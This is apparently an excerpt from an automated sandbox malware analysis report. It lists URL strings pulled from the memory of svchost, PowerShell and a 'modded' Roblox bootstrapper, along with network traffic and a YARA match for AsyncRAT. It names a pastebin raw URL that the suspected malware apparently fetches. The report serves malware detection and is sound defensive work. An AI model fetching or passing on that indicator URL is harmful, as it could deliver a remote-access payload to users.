                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfe.com
                          Source: svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80600
                          Source: svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80601
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageAp
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApcfg:
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf53457
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLogin
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                          Source: svchost.exe, 0000000E.00000002.2614689488.0000029106CB7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2616206902.0000029107A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615972777.0000029107A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                          Source: svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf0
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfD
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                          Source: svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=805024
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                          Source: svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806045
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                          Source: svchost.exe, 0000000E.00000003.1560409249.0000029107557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                          Source: svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&amp;fid=cp
                          Source: svchost.exe, 0000000E.00000003.1560181005.000002910755A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cpth.srf?id=80601&amp;
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srfQ
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfc
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srff
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                          Source: svchost.exe, 0000000E.00000002.2614824394.0000029106CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfSt
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfToken
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBB0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ncs.roblox.com/upload
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBAC000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                          Source: powershell.exe, 00000005.00000002.1471543702.000001A99745F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1603906589.000001D5E175F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1799985750.000001D210070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.drString found in binary or memory: https://pastebin.com/raw/pjseRvyK
                          Source: svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                          Source: BootstrapperV1.23_ModdedByHisako.exe.0.drString found in binary or memory: https://www.newtonsoft.com/jsonschema
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nodejs.org
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.drString found in binary or memory: https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                          Source: BootstrapperV1.23_ModdedByHisako.exe.0.drString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                          Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.8:49706 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.8:49709 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 128.116.119.3:443 -> 192.168.2.8:49710 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.20.22.46:443 -> 192.168.2.8:49711 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Yara detected AsyncRAT
                          Source: Yara matchFile source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3059b50.1.unpack, type: UNPACKEDPE
